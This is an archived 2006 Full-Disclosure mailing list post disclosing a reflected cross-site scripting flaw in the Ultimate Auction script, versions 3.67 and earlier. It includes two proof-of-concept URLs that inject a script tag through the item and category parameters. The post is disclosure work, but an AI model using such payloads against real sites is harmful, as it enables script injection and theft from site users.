[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Ultimate Auction <=3.67

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Ultimate Auction <=3.67
From: Querkopf <druck_von_rechts@xxxxxx>
Date: Sun, 15 Jan 2006 16:41:19 +0000

Hello!

I've found a XSS in Ultimate Auction <=3.67. The Vendor was informed mid
October 2005! They still haven't fix the script and doesn't reply to mails.

Here's a little Example:


http://www.ultimate-auction.de/cgi-local/auktion/item.pl/item.pl?item=<script>alert("XSS")</script>
http://www.ultimate-auction.de/cgi-local/auktion/itemlist.pl?category=<script>alert("XSS")</script>

The bug has the BID 16239
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] Re: [CIRT.DK] Apple QuickTime 7.0.3 and earlier - JPG/PICT Buffer Overflow
Next by Date: [Full-disclosure] DMA[2006-0115a] - 'AmbiCom Bluetooth Object Push Overflow'
Previous by thread: [Full-disclosure] Re: [CIRT.DK] Apple QuickTime 7.0.3 and earlier - JPG/PICT Buffer Overflow
Next by thread: [Full-disclosure] DMA[2006-0115a] - 'AmbiCom Bluetooth Object Push Overflow'
Index(es):
- Date
- Thread